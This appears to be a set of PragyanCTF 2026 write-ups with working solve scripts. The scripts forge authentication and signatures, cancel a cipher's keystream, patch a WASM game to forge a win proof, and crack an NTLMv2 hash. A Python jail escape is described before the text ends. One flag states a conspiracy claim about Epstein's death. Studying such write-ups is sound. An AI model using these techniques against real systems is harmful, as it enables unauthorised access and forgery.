🇮🇳PragyanCTF 2026

Writeups for most challenges

crypto

Dor4_Null5

Description

A challenge-response authentication system where users can register and login. Only the "Administrator" user reveals the flag. We don't know the Administrator's secret, but the verification function has a critical weakness.

The server implements:

Registration: Store a username + 64-char password hash
Login: Challenge-response protocol using HKDF-derived keys, AES-ECB path computation, and HMAC-masked verification

Solution

The vulnerability is in verify_credential:

def verify_credential(session_key, expected, provided):
    h = HMAC.new(session_key, expected, SHA256)
    mask = h.digest()[:8]
    checksum = 0
    for i in range(8):
        checksum ^= expected[i] ^ provided[i] ^ mask[i]
    return checksum == 0

Instead of comparing each byte individually, it XORs all comparison results into a single byte accumulator. The check checksum == 0 only verifies:

XOR_all(expected) ^ XOR_all(provided) ^ XOR_all(mask) == 0

This is a single byte constraint — for any fixed provided, there's a 1/256 chance the checksum is zero regardless of whether we know expected or mask. Since the server allows up to 0x1337 (4919) menu interactions, we can brute-force this with ~256 expected attempts.

Each login attempt uses a fresh random server_token, making navigation_key, expected, and mask effectively random from our perspective. We simply repeat login attempts with a fixed response until the weak XOR check passes by chance.

from pwn import *

context.log_level = 'warn'

r = remote("dora-nulls.ctf.prgy.in", 1337, ssl=True)

for attempt in range(3000):
    r.sendlineafter(b"choose ", b"1")
    r.sendlineafter(b"challenge (hex): ", b"00" * 8)
    r.sendlineafter(b"username: ", b"Administrator")
    r.recvuntil(b"server challenge: ")
    r.recvline()  # discard server token
    r.sendlineafter(b"response (hex): ", b"00" * 8)

    result = r.recvline().decode().strip()
    if "successful" in result:
        print(f"[+] Success on attempt {attempt + 1}!")
        print(result)
        print(r.recvline().decode().strip())
        break

r.close()

Succeeds in ~150-300 attempts on average.

Flag: p_ctf{th15_m4ps-w0n't_l3ads_2_tr34s3ure!}

DumCows

Description

You can connect to a remote service that prints a cow and asks for a name. For any input name, it returns:

[Name: <base64>] says: <base64>

Sending FIX_COW <voice> is a special command; with the correct voice it prints a “FLAG SPEAKS” ciphertext.

Solution

Key observation: deterministic keystream reset per connection (multiple backends).

If you open a fresh connection and send a 16+ byte name, the service returns a ciphertext of the same length. For two different 16-byte plaintexts P and P' used as the first name in fresh connections, C ^ P and C' ^ P' are identical (for that backend). This indicates a stream cipher / OTP-style construction:

C = P XOR K

The keystream K is deterministic from the start of the connection. The host is load-balanced: different backends have different K, so you must ensure the two connections you combine are on the same backend (just retry until the decrypted plaintext matches an expected pattern).

Recover the voice.

On the first request in a connection, the server encrypts the name and also encrypts a fixed 18-byte secret in the “says” field.

If you send an empty name, the secret is encrypted with the first 18 keystream bytes K[0:18].
In another fresh connection, if you send a known 18-byte name P, you can recover K[0:18] = C_name XOR P.
Decrypt the secret voice: voice = C_says XOR K[0:18].

Recover the flag.

With the correct voice, FIX_COW <voice> prints a base64 string that decodes to 30 bytes (this is the ciphertext).

Send FIX_COW <voice> as the very first command in a fresh connection so it uses K[0:30].

In another fresh connection to the same backend, send a 30-byte known name P to recover K[0:30], then:

flag = C_flag XOR K[0:30]

Retry until the result matches the known flag format p_ctf{...}.

#!/usr/bin/env python3
import base64
import re
import socket
import ssl
from typing import Tuple


HOST = "dum-cows.ctf.prgy.in"
PORT = 1337


def _connect() -> ssl.SSLSocket:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    s = ctx.wrap_socket(socket.socket(), server_hostname=HOST)
    s.settimeout(10)
    s.connect((HOST, PORT))
    return s


def _recv_until(s: ssl.SSLSocket, needle: bytes, timeout: float = 10.0) -> bytes:
    s.settimeout(timeout)
    buf = b""
    while needle not in buf:
        chunk = s.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def first_name_response(name: bytes) -> Tuple[bytes, bytes]:
    s = _connect()
    _recv_until(s, b"Give your cow a name", timeout=5.0)
    s.sendall(name + b"\n")
    out = _recv_until(s, b"Give your cow a name", timeout=5.0)
    s.close()

    m = re.search(rb"\[Name: ([A-Za-z0-9+/=]*)\] says: ([A-Za-z0-9+/=]+)", out)
    if not m:
        raise RuntimeError("failed to parse name response")
    enc_name = base64.b64decode(m.group(1) or b"")
    enc_says = base64.b64decode(m.group(2))
    return enc_name, enc_says


def first_fix_flag_cipher(voice: bytes) -> bytes:
    s = _connect()
    _recv_until(s, b"Give your cow a name", timeout=5.0)
    s.sendall(b"FIX_COW " + voice + b"\n")

    # The service does not re-print the name prompt after FIX_COW; just read what's available.
    s.settimeout(1.0)
    out = b""
    while True:
        try:
            out += s.recv(4096)
        except Exception:
            break
    s.close()

    m = re.search(rb"THE FLAG SPEAKS:\n([A-Za-z0-9+/=]+)", out)
    if not m:
        raise RuntimeError("failed to parse flag ciphertext")
    return base64.b64decode(m.group(1) + b"==")  # 30 bytes


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_voice(max_tries: int = 50) -> bytes:
    # From empty-name session we get: C_says = voice XOR K[0:18]
    _, c_says = first_name_response(b"")

    known = b"A" * 18
    for _ in range(max_tries):
        # From known-name session we get: C_name = known XOR K[0:18]
        c_name, _ = first_name_response(known)
        k = xor(c_name, known)
        voice = xor(c_says, k)
        # The correct backend yields a readable voice.
        if all(32 <= c < 127 for c in voice):
            return voice
    raise RuntimeError("failed to recover voice (backend mismatch too often?)")


def recover_flag(max_tries: int = 200) -> bytes:
    voice = recover_voice()

    known = b"A" * 30
    for _ in range(max_tries):
        c_flag = first_fix_flag_cipher(voice)  # C_flag = flag XOR K[0:30]
        c_name, _ = first_name_response(known)  # C_name = known XOR K[0:30]
        k = xor(c_name, known)
        flag = xor(c_flag, k)
        if flag.startswith(b"p_ctf{") and flag.endswith(b"}"):
            return flag
    raise RuntimeError("failed to recover flag (backend mismatch too often?)")


if __name__ == "__main__":
    print(recover_flag().decode())

!!Cand1esaNdCrypt0!!

Description

A cake ordering server uses RSA signatures over a custom polynomial hash g(x, a, b) = (x³ + ax² + bx) mod P where P is a 128-bit prime. You can sign one "approval" message and must forge a signature on a "transaction" message to get the flag.

Solution

The key insight is that g(x, a, b) = x(x² + ax + b) mod P, so g(0, a, b) = 0 for any a, b. If we craft a transaction suffix such that x ≡ 0 (mod P), then the hash is 0 and the RSA signature of 0 is simply 0 (since 0^d mod n = 0). No signing oracle needed.

The input x is constructed as bytes_to_long(B || suffix || \x4D) where B = "I authorize the transaction:\n" and suffix is 48 printable ASCII bytes. We need:

bytes_to_long(suffix) ≡ (-BL · 256^49 - 0x4D) · 256^(-1)  (mod P)

Since P is 128-bit (16 bytes) and the suffix is 48 bytes (384 bits), we fix 32 bytes randomly and compute the remaining 16 bytes mod P, retrying until all 16 bytes fall in printable ASCII range [32, 126]. This succeeds with probability ~(95/256)^16 ≈ 1 in 2.8M, easily brute-forced.

#!/usr/bin/env python3
import os
from Crypto.Util.number import bytes_to_long
from pwn import *

P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF61
B = b"I authorize the transaction:\n"

# Compute required suffix value mod P for x ≡ 0 (mod P)
BL = bytes_to_long(B)
inv256 = pow(256, -1, P)
req = (-BL * pow(256, 49, P) - 0x4D) * inv256 % P

# Find 48-byte printable suffix: high (32 bytes) || low (16 bytes)
# L = (req - H * 256^16) % P — need all 16 bytes in [32, 126]
shift = pow(256, 16, P)
table = bytes([(b % 95) + 32 for b in range(256)])

print("[*] Searching for printable suffix where x ≡ 0 (mod P)...")
count = 0
while True:
    count += 1
    high = os.urandom(32).translate(table)
    H = int.from_bytes(high, 'big')
    L = (req - H * shift) % P
    low = L.to_bytes(16, 'big')
    if min(low) >= 32 and max(low) <= 126:
        suffix = high + low
        break
    if count % 500000 == 0:
        print(f"    ... {count} attempts")

print(f"[+] Found suffix after {count} attempts")

# Verify
def pad(x): return x + bytes([len(x) & 255])
x = bytes_to_long(pad(B + suffix))
assert x % P == 0

# Exploit: skip signing, go straight to transaction with signature = 0
io = remote('candles.ctf.prgy.in', 1337, ssl=True)
io.recvuntil(b'> ')
io.sendline(b'2')
io.recvuntil(b'Suffix:')
io.sendline(suffix)
io.recvuntil(b'Signature:')
io.sendline(b'0')
print(io.recvall(timeout=10).decode())

Flag: p_ctf{3l0w-tH3_c4Ndl35.h4VE=-tHe_CaK3!!}

R0tnoT13

Description

Given a 128-bit internal state S, we receive several diagnostic frames of the form S XOR ROTR(S, k) for rotation offsets k in {2, 4, 8, 16, 32, 64}. A ciphertext encrypted using the state is also provided. Recover S and decrypt the flag.

Solution

The key insight is that all rotation offsets are powers of 2, which means even-indexed bits and odd-indexed bits are never mixed across any frame. This reduces the problem to exactly 2 unknown bits (one for each parity class).

Using the k=2 frame, we express every bit of S in terms of s_0 (for even bits) and s_1 (for odd bits):

s_{2i} = s_0 XOR d_0 XOR d_2 XOR ... XOR d_{2i-2} where d_j is bit j of the k=2 frame
s_{2i+1} = s_1 XOR d_1 XOR d_3 XOR ... XOR d_{2i-1}

With only 4 candidate states, we brute-force (s_0, s_1), verify each candidate against all 6 frames for consistency, and XOR the valid state with the ciphertext. The combination s_0=1, s_1=0 produces the flag via simple XOR decryption.

from Crypto.Cipher import AES

frames = {
    8: 183552667878302390742187834892988820241,
    4: 303499033263465715696839767032360064630,
    16: 206844958160238142919064580247611979450,
    2: 163378902990129536295589118329764595602,
    64: 105702179473185502572235663113526159091,
    32: 230156190944614555973250270591375837085,
}

ciphertext = bytes.fromhex("477eb79b46ef667f16ddd94ca933c7c0")
MASK = (1 << 128) - 1

def rotr(val, k, n=128):
    return ((val >> k) | (val << (n - k))) & MASK

def int_to_bits(n, nbits=128):
    return [(n >> i) & 1 for i in range(nbits)]

d = int_to_bits(frames[2])

# Build cumulative XOR offsets for even and odd bit cycles
bit_const = [0] * 128
cumxor = 0
for i in range(0, 128, 2):
    bit_const[i] = cumxor
    cumxor ^= d[i]
cumxor = 0
for i in range(1, 128, 2):
    bit_const[i] = cumxor
    cumxor ^= d[i]

# Brute force 2 unknown bits
for s0 in range(2):
    for s1 in range(2):
        bits = [0] * 128
        for j in range(128):
            bits[j] = (s0 if j % 2 == 0 else s1) ^ bit_const[j]

        S = sum(b << i for i, b in enumerate(bits))

        # Verify against all frames
        if all(S ^ rotr(S, k) == v for k, v in frames.items()):
            S_bytes = S.to_bytes(16, 'big')
            plaintext = bytes(a ^ b for a, b in zip(ciphertext, S_bytes))
            print(f"s0={s0}, s1={s1}: {plaintext}")

Flag: p_ctf{l1nyrl34k}

forensics

epstein files

Description

You are provided with a PDF file related to an ongoing investigation. The document appears complete, but not everything is as it seems. Analyze the file carefully and recover the hidden flag. (Flag format: pctf{...})

Solution

The PDF contains 95 pages of Epstein's "black book" contacts. The flag is hidden through a 4-layer chain: a hidden PDF comment, XOR decoding, GPG decryption, and ROT18.

Step 1: Find the hidden PDF comment

A PDF comment (lines starting with % are ignored by renderers) is embedded inside a StructElem dictionary at object 1730 (offset 13554619):

% /Hidden (3e373f283d312d25222332362c3d2e292322)

strings contacts.pdf | grep -i "Hidden"
# Output: % /Hidden (3e373f283d312d25222332362c3d2e292322)

Step 2: Find the XOR key from hidden text on page 94

Page 94 (0-indexed 93) contains two text strings rendered in font F12 with black color (0 0 0 rg), then covered by a near-black rectangle (0.1098 0.1098 0.1098 rg) drawn on top, making them invisible:

XOR_KEY at position (422.986, 173.452)
JEFFREY at position (422.986, 146.92)

This tells us: the XOR key is "JEFFREY".

Step 3: XOR the hidden hex to get the GPG passphrase

import binascii

hex_str = '3e373f283d312d25222332362c3d2e292322'
data = bytes.fromhex(hex_str)
key = b'jeffrey'  # lowercase
result = bytes([d ^ key[i % len(key)] for i, d in enumerate(data)])
print(result.decode())  # TRYNOTTOGETDIDDLED

The passphrase is trynottogetdiddled (lowercase).

Step 4: Decrypt the GPG data after %%EOF

109 bytes of OpenPGP encrypted data are appended after the PDF's %%EOF marker. This is a SKESK v4 packet (AES256, SHA512 S2K, 52M iterations) followed by a SEIPD v1 packet.

# Strip leading newline from after-EOF data
python3 -c "
import sys
data = open('contacts.pdf','rb').read()
eof = data.rfind(b'%%EOF')
after = data[eof+5:].lstrip()
open('after_eof_stripped.bin','wb').write(after)
"

# Decrypt with passphrase
echo -n "trynottogetdiddled" | gpg --batch --passphrase-fd 0 -d after_eof_stripped.bin
# Output: cpgs{96a2_a5_j9l_u8_0h6p6q8}

Step 5: ROT18 decode (ROT13 letters + ROT5 digits)

The decrypted output cpgs{...} has cpgs = ROT13 of pctf, and the digits are ROT5-encoded:

decrypted = 'cpgs{96a2_a5_j9l_u8_0h6p6q8}'
result = []
for c in decrypted:
    if c.isalpha():
        base = ord('a') if c.islower() else ord('A')
        result.append(chr((ord(c) - base + 13) % 26 + base))
    elif c.isdigit():
        result.append(str((int(c) + 5) % 10))
    else:
        result.append(c)
print(''.join(result))  # pctf{41n7_n0_w4y_h3_5u1c1d3}

The flag in leetspeak reads: "AINT NO WAY HE SUICIDE" - a reference to the Epstein conspiracy.

Flag: pctf{41n7_n0_w4y_h3_5u1c1d3}

H@rDl4u6H

Description

A single file smile.bin (6.4 MB) containing multiple steganographic layers, Joker-themed. The flag is hidden through a chain: corrupted WAV with embedded audio stego password, encrypted 7z archive containing a PNG, a GPG-encrypted poem in the archive's trailing bytes, and finally a frequency-domain encoding scheme in the PNG image that must be XOR-decrypted with a key hidden in the image itself.

Solution

Layer 1: Carve WAV + 7z from smile.bin

The file starts with FAKE instead of RIFF. The RIFF size field gives the WAV length (882164 bytes). A 7z archive follows at that offset.

with open("smile.bin", "rb") as f:
    data = f.read()

# Fix WAV header
wav_data = b"RIFF" + data[4:882164]
with open("smile.wav", "wb") as f:
    f.write(wav_data)

# Carve 7z
with open("payload.7z", "wb") as f:
    f.write(data[882164:])

Layer 2: Audio LSB steganography

The WAV's ICMT metadata contains base64 encoding of https://github.com/sniperline047/Audio-Steganography-CLI. Using that tool's basic LSB decoder on the WAV extracts the password: transform.

# Using Audio-Steganography-CLI's basic_lsb_steganography.decode()
# on smile.wav yields: "transform"

Layer 3: Extract encrypted 7z

The 7z archive is password-protected. Using transform extracts a single file y0uc4n7533m3 — a 3000x4500 8-bit grayscale PNG.

7z x -ptransform payload.7z

Layer 4: GPG-encrypted poem in 7z tail

482 bytes trail after the 7z archive's end. The first 8 bytes are rosetta\n, followed by a PGP symmetrically-encrypted message. Decrypting with password rosetta reveals a poem describing the encoding scheme:

21 concentric rings in the FFT domain, each encoding 8 bits
Start at east (0 degrees), walk counter-clockwise in 22.5 degree steps (8 positions)
Dark (absence of FFT peak) = 1, Bright (FFT peak present) = 0
Second half of each ring mirrors the first half

# Extract tail after 7z
dd if=payload.7z of=tail.bin bs=1 skip=5812634
# Strip "rosetta\n" prefix, decrypt
tail -c +9 tail.bin | gpg --batch --passphrase rosetta -d

Layer 5: FFT frequency-domain decoding

The 2D FFT of the PNG shows a starburst pattern with peaks at 21 radii (~100, 169, 238, ..., 1480; spacing ~69 px) and 8 angles (0, 22.5, 45, 67.5, 90, 112.5, 135, 157.5 degrees). Peaks split cleanly into present (log-mag ~13.8) and absent (log-mag ~11.1).

import numpy as np
from PIL import Image

img = np.array(Image.open("y0uc4n7533m3")).astype(float)
F = np.fft.fft2(img)
F_shifted = np.fft.fftshift(F)
mag = np.log(1 + np.abs(F_shifted))

cy, cx = mag.shape[0] // 2, mag.shape[1] // 2
radii = [100 + 69 * i for i in range(21)]
angles_deg = [0, 22.5, 45, 67.5, 90, 112.5, 135, 157.5]

THRESHOLD = 13.0
ciphertext = []

for r in radii:
    byte_val = 0
    for j, a in enumerate(angles_deg):
        a_rad = np.radians(a)
        # FFT coordinates: x=right, y=up (image y is flipped)
        fx = cx + r * np.cos(a_rad)
        fy = cy - r * np.sin(a_rad)
        peak_mag = mag[int(round(fy)), int(round(fx))]
        # Dark (no peak) = 1, Bright (peak) = 0
        bit = 0 if peak_mag > THRESHOLD else 1
        byte_val = (byte_val << 1) | bit
    ciphertext.append(byte_val)

Layer 6: XOR decrypt with key from image

The PNG contains a key written vertically on the left margin, visible after contrast/histogram equalization: prgynxoxo. XOR the 21-byte ciphertext with this repeating key:

key = b"prgynxoxo"
plaintext = bytes([ciphertext[i] ^ key[i % len(key)] for i in range(21)])
# Result: p_ctf{why_50_53r10u5}

Flag: p_ctf{why_50_53r10u5}

Leetspeak for "why so serious" — the Joker's iconic line.

$whoami

Description

An internal investigation flagged an anomalous access event involving a restricted internal resource. A packet capture was taken during the suspected time window. The task is to identify the account responsible and the credentials used.

Flag format: p_ctf{username:password}

Solution

Step 1: Protocol analysis

The pcap contains SSH, HTTP, and SMB2 traffic between 10.1.54.28 (client) and 10.1.54.102 (server).

Step 2: Identify the suspicious account

Examining SMB2 sessions reveals multiple user authentications: b.banner, groot, p.parker, hawkeye, and t.stark. Most users only connected to \\10.1.54.102\IPC$, but t.stark was the only account that successfully accessed the restricted share \\10.1.54.102\SecretPlans.

tshark -r capture.pcap -Y smb2 -T fields -e smb2.acct -e smb2.tree -e smb2.nt_status

Step 3: Extract password policy and project list from HTTP traffic

The HTTP traffic contained several files served from the internal web server. Two were critical:

/policy.txt: SECURITY POLICY: Passwords must be [ProjectName][TimestampOfCreation_Epoch].
/notion.so: Listed ongoing projects: SuperHeroCallcentre, Terrabound, OceanMining, Arcadia

Step 4: Extract NTLMv2 authentication data

From t.stark's SMB2 Session Setup (NTLMSSP_AUTH):

tshark -r capture.pcap -Y "ntlmssp.messagetype == 0x00000003" -T fields \
  -e ntlmssp.auth.username -e ntlmssp.auth.domain -e ntlmssp.ntlmserverchallenge \
  -e ntlmssp.auth.ntresponse

Username: t.stark
Domain: (empty)
Server challenge: e3ec06e38823c231
NTProofStr: 977bf57592dc13451d54be92d94a095d
NTLMv2 blob: (extracted from response)

Step 5: Crack the NTLMv2 hash

Given the password policy [ProjectName][EpochTimestamp], the password is one of the 4 project names concatenated with a Unix epoch timestamp. A Python script implementing NTLMv2 verification was used to brute-force the combination:

import struct, hmac, hashlib

def left_rotate(n, b):
    return ((n << b) | (n >> (32 - b))) & 0xffffffff

def md4(data):
    h0, h1, h2, h3 = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
    msg = bytearray(data)
    ml = len(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack('<Q', ml * 8)
    for i in range(0, len(msg), 64):
        X = list(struct.unpack('<16I', msg[i:i+64]))
        a, b, c, d = h0, h1, h2, h3
        FF = lambda a,b,c,d,k,s: left_rotate((a + ((b&c)|((~b)&d)) + X[k]) & 0xffffffff, s)
        a=FF(a,b,c,d,0,3); d=FF(d,a,b,c,1,7); c=FF(c,d,a,b,2,11); b=FF(b,c,d,a,3,19)
        a=FF(a,b,c,d,4,3); d=FF(d,a,b,c,5,7); c=FF(c,d,a,b,6,11); b=FF(b,c,d,a,7,19)
        a=FF(a,b,c,d,8,3); d=FF(d,a,b,c,9,7); c=FF(c,d,a,b,10,11); b=FF(b,c,d,a,11,19)
        a=FF(a,b,c,d,12,3); d=FF(d,a,b,c,13,7); c=FF(c,d,a,b,14,11); b=FF(b,c,d,a,15,19)
        GG = lambda a,b,c,d,k,s: left_rotate((a + ((b&c)|(b&d)|(c&d)) + X[k] + 0x5a827999) & 0xffffffff, s)
        a=GG(a,b,c,d,0,3); d=GG(d,a,b,c,4,5); c=GG(c,d,a,b,8,9); b=GG(b,c,d,a,12,13)
        a=GG(a,b,c,d,1,3); d=GG(d,a,b,c,5,5); c=GG(c,d,a,b,9,9); b=GG(b,c,d,a,13,13)
        a=GG(a,b,c,d,2,3); d=GG(d,a,b,c,6,5); c=GG(c,d,a,b,10,9); b=GG(b,c,d,a,14,13)
        a=GG(a,b,c,d,3,3); d=GG(d,a,b,c,7,5); c=GG(c,d,a,b,11,9); b=GG(b,c,d,a,15,13)
        HH = lambda a,b,c,d,k,s: left_rotate((a + (b^c^d) + X[k] + 0x6ed9eba1) & 0xffffffff, s)
        a=HH(a,b,c,d,0,3); d=HH(d,a,b,c,8,9); c=HH(c,d,a,b,4,11); b=HH(b,c,d,a,12,15)
        a=HH(a,b,c,d,2,3); d=HH(d,a,b,c,10,9); c=HH(c,d,a,b,6,11); b=HH(b,c,d,a,14,15)
        a=HH(a,b,c,d,1,3); d=HH(d,a,b,c,9,9); c=HH(c,d,a,b,5,11); b=HH(b,c,d,a,13,15)
        a=HH(a,b,c,d,3,3); d=HH(d,a,b,c,11,9); c=HH(c,d,a,b,7,11); b=HH(b,c,d,a,15,15)
        h0=(h0+a)&0xffffffff; h1=(h1+b)&0xffffffff; h2=(h2+c)&0xffffffff; h3=(h3+d)&0xffffffff
    return struct.pack('<4I', h0, h1, h2, h3)

projects = ['SuperHeroCallcentre', 'Terrabound', 'OceanMining', 'Arcadia']

user = "t.stark"
domain = ""
sc = bytes.fromhex("e3ec06e38823c231")
expected_proof = "977bf57592dc13451d54be92d94a095d"
blob = bytes.fromhex("01010000000000005c9535bd3c97dc01bd8ada676c80c318"
    "0000000002002c00530055004e004c00410042002d005000"
    "5200450043004900530049004f004e002d00540031003600"
    "3500300001002c00530055004e004c00410042002d005000"
    "5200450043004900530049004f004e002d00540031003600"
    "35003000040000000300  2c00730075006e006c00610062"
    "002d0070007200650063006900730069006f006e002d0074"
    "003100360035003000070008005c9535bd3c97dc01060004"
    "000200000008005000500000000000000000000000003000"
    "005057d986966e3d7d60e8bd92deb9e761f8ce9fa4941212"
    "bdba96c1840385d47e8b7fdec0ec98e0038631cb9ce097e3"
    "91536012e8cff9908f333c76f932a7e9930a001000000000"
    "000000000000000000000000000009002000630069006600"
    "73002f00310030002e0031002e00350034002e0031003000"
    "32000000000000000000")

# Jan 1, 2016 00:00:00 UTC = epoch 1451606400
for project in projects:
    for epoch in range(1451606400, 1483228800, 86400):  # daily through 2016
        password = f"{project}{epoch}"
        nt_hash = md4(password.encode('utf-16-le'))
        identity = (user.upper() + domain).encode('utf-16-le')
        ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()
        proof = hmac.new(ntlmv2_hash, sc + blob, hashlib.md5).digest()
        if proof.hex() == expected_proof:
            print(f"Password: {password}")
            # Epoch 1451606400 = 2016-01-01 00:00:00 UTC

The cracking revealed: password = Arcadia1451606400 (project "Arcadia" + epoch for Jan 1, 2016 00:00:00 UTC).

Flag: p_ctf{t.stark:Arcadia1451606400}

Plumbing

Description

We found a Docker image that was already built and shipped. Something sensitive might have slipped through during build time, but the final container looks clean?? Analyze the image and recover what was lost.

Flag format: p_ctf{...}

Attachment: app.tar (OCI Docker image)

Solution

The challenge provides a Docker image exported as app.tar. The key insight is that Docker images store the full build history, including all commands from the Dockerfile, in the image config JSON. Even if files are deleted in later layers, the build commands remain visible.

Step 1: Extract and inspect the image config

tar xf app.tar
# manifest.json points to the config blob
cat manifest.json
# Config: blobs/sha256/b3f4caf17486575f3b37d7e701075fe537fe7c9473f38ce1d19d769ea393913d
python3 -m json.tool blobs/sha256/b3f4caf17486575f3b37d7e701075fe537fe7c9473f38ce1d19d769ea393913d

Step 2: Read the build history

The image config contains the full Dockerfile history. The critical entries are:

COPY process.py .                    # encryption script
COPY env /app/.env                   # AES key
RUN echo "p_ctf{d0ck3r_l34k5_p1p3l1n35}X|O" | python3 process.py
RUN rm /tmp/state_round7.bin         # cleanup attempt
RUN echo "uhh it was here ;-;" > /app/output.bin  # overwrite output
COPY DEV_NOTES.txt .
COPY process2.py /app/process.py     # replace with empty script

The flag p_ctf{d0ck3r_l34k5_p1p3l1n35} is leaked directly in the RUN command visible in the image history. Despite the cleanup steps (deleting intermediate files, overwriting output, replacing the script), the Dockerfile build commands are permanently recorded in the image config.

Additional forensic artifacts available in intermediate layers:

By inspecting earlier layers, one can also recover:

process.py: A toy block cipher using XOR and permutation with 10 rounds
.env: Contains AES_KEY=THIS_IS_AES_KEY!
state_round7.bin: Debug dump of encryption state at round 7
output.bin: Encrypted second block of the input

But none of these are needed since the flag is directly visible in the build history.

Flag: p_ctf{d0ck3r_l34k5_p1p3l1n35}

c47chm31fy0uc4n

Description

We are given a Linux memory dump (attachments/memdump.fin) from shortly after an incident. We must recover, from memory only:

The session key exfiltrated by a malicious userspace process
The epoch timestamp used during exfiltration
The destination IP used for exfiltration
The attacker's ephemeral source port during remote (SSH) access

Flag format:

p_ctf{<session_key>:<epoch>:<exfiltration_ip>:<ephemeral_remote_execution_port>}

Solution

This solve can be done with simple string carving; no kernel symbols needed.

Extract the exfiltration record (session key, epoch, destination IP)

strings -a -n 6 attachments/memdump.fin | rg -n "SYNC " | head

This reveals the exfiltration line:

SYNC FLAG{heap_and_rwx_never_lie} 1769853900 10.13.37.7

So:

session_key = heap_and_rwx_never_lie (the value inside FLAG{...})
epoch = 1769853900
exfiltration_ip = 10.13.37.7

You can confirm the process kept the key in its environment:

strings -a -n 6 attachments/memdump.fin | rg -n "SESSION_KEY=" | head

Identify the attacker's SSH ephemeral source port

First, list the SSH login artifacts present in memory:

strings -a -n 6 attachments/memdump.fin | rg "Accepted password for" | sort -u

Multiple SSH source ports appear, so we correlate the malicious execution context (msg_sync) to the SSH session environment block.

strings -a -n 6 attachments/memdump.fin | rg -n -m 1 -C 80 "msg_sync --session=FLAG\\{heap_and_rwx_never_lie\\}"

In that context, the SSH environment variables show:

SSH_CLIENT=192.168.153.1 57540 22
SSH_CONNECTION=192.168.153.1 57540 192.168.153.130 22
SSH_TTY=/dev/pts/0

Therefore the attacker session’s ephemeral source port is 57540.

Assemble the final flag

p_ctf{heap_and_rwx_never_lie:1769853900:10.13.37.7:57540}

misc

Lost in the Haze

Description

A geolocation/OSINT challenge providing a Google Street View image (whereami.png) of a Japanese urban street. The challenge title is "Lost in the Haze" with the description: "I remember stepping outside for a moment. The air felt heavy, the lights too bright, the streets unfamiliar. All I know is that this location has a name."

Flag format: p_ctf{ward_name}

Solution

The key clue is in the challenge title: "Lost in the Haze."

The word "haze" translates to kasumi (霞) in Japanese. The most famous location in Japan with "kasumi" in its name is Kasumigaseki (霞ヶ関), literally meaning "Gate of Mist/Haze." Kasumigaseki is located in Chiyoda ward (千代田区), Tokyo, and is well known as Japan's government district.

The image confirms a Japanese urban setting via Google Street View, showing narrow streets with a distinctive granite stone wall, vending machines, and dense residential/commercial buildings typical of central Tokyo.

Combining the linguistic hint with the visual confirmation:

"Haze" → kasumi (霞) → Kasumigaseki (霞ヶ関) → Chiyoda ward

Flag: p_ctf{chiyoda}

Tac Tic Toe

Description

A web-based tic-tac-toe game at https://tac-tic-toe.ctf.prgy.in where you play against an AI. The game logic runs in a Go-compiled WebAssembly module (main.wasm). The AI uses minimax, making it unbeatable through normal play. Winning the game triggers a /win endpoint that returns the flag, but it requires a valid cryptographic proof generated by the WASM.

Solution

The game flow:

GET /start returns a session_id and proof_seed
The WASM initializes with the seed, and each move (player + AI) updates a rolling proof via UpdateProof() using custom mixing functions (proofMixA/B/C/D)
On win, GetWinData() returns the move sequence and proof, which is submitted to POST /win for server-side verification

The server validates the proof against the seed and moves but does not enforce that the AI played optimally -- it only replays the moves and checks the proof matches. This means if we patch the WASM to make the AI play poorly, the proof will still be valid because UpdateProof depends only on move positions and the seed, not on how the AI chose its move.

Steps:

Download main.wasm and convert to WAT text format using wasm2wat
Locate the main.playPerfectMove function which selects the AI's best move via minimax
Patch two values:
- Change initial bestScore from -1000 to 1000 (so the AI starts looking for the minimum score)
- Change the comparison i64.lt_s to i64.gt_s (so the AI picks the worst move instead of the best)
Convert back to WASM with wat2wasm
Run the patched WASM in Node.js with the server's proof_seed, play winning moves, and submit the resulting proof

The patched AI places its marks in the worst positions. Playing moves [0, 3, 6] (left column) wins in 3 turns:

Player -> 0, AI -> 1
Player -> 3, AI -> 2
Player -> 6 (win: left column)

// solve_final.js
const fs = require("fs");
require("./wasm_exec.js");

async function main() {
  const startRes = await fetch("https://tac-tic-toe.ctf.prgy.in/start");
  const startData = await startRes.json();

  const go = new Go();
  const wasmBuffer = fs.readFileSync("./main_patched2.wasm");
  const result = await WebAssembly.instantiate(wasmBuffer, go.importObject);
  go.run(result.instance);

  InitGame(startData.proof_seed);

  for (const m of [0, 3, 6]) {
    if (globalThis.gameStatus !== "playing") break;
    PlayerMove(m);
  }

  const data = GetWinData();
  const payload = {
    session_id: startData.session_id,
    final_board: data.moves,
    proof: data.proof
  };

  const res = await fetch("https://tac-tic-toe.ctf.prgy.in/win", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload)
  });
  console.log(await res.text());
}

main();

The WASM patching was done with:

wasm2wat main.wasm -o main.wat
# Line 520166: change "i64.const -1000" to "i64.const 1000"
# Line 520297: change "i64.lt_s" to "i64.gt_s"
wat2wasm main_patched.wat -o main_patched2.wasm

Flag: p_ctf{W@sM@_!s_Fas&t_Bu?_$ecur!ty}

pwn

pCalc

Description

A "super secure calculator" Python jail. The server evaluates user input through eval() with restricted builtins ({"__builtins__": {}}) and an AST validator that only allows math-related nodes (BinOp, UnaryOp, Constant, Name, operator, unaryop) plus JoinedStr (f-strings). An audit hook blocks os.system, os.popen, subprocess.Popen, and opening files with "flag" in the name. The string "import" is also blocked in the raw input.

Solution

Three vulnerabilities chained together:

F-string AST bypass: The AST validator allows JoinedStr (f-string) nodes but does pass instead of recursing into children. This means arbitrary Python expressions inside f"{...}" are never validated.
Object hierarchy for builtins: Since __builtins__ is empty in the eval context, we walk Python's object hierarchy ().__class__.__mro__[1].__subclasses__() to find a class with a Python __init__ function, then access __init__.__globals__['__builtins__'] to recover the full builtins dict.
Bytes path audit bypass: The audit hook checks isinstance(args[0], str) and 'flag' in args[0]. Passing the filename as bytes (b'flag.txt') makes isinstance(args[0], str) return False, bypassing the check entirely.

The "import" filter is bypassed with string concatenation ('__imp'+'ort__'), though it's not even needed for the file read payload.

#!/usr/bin/env python3
from pwn import *

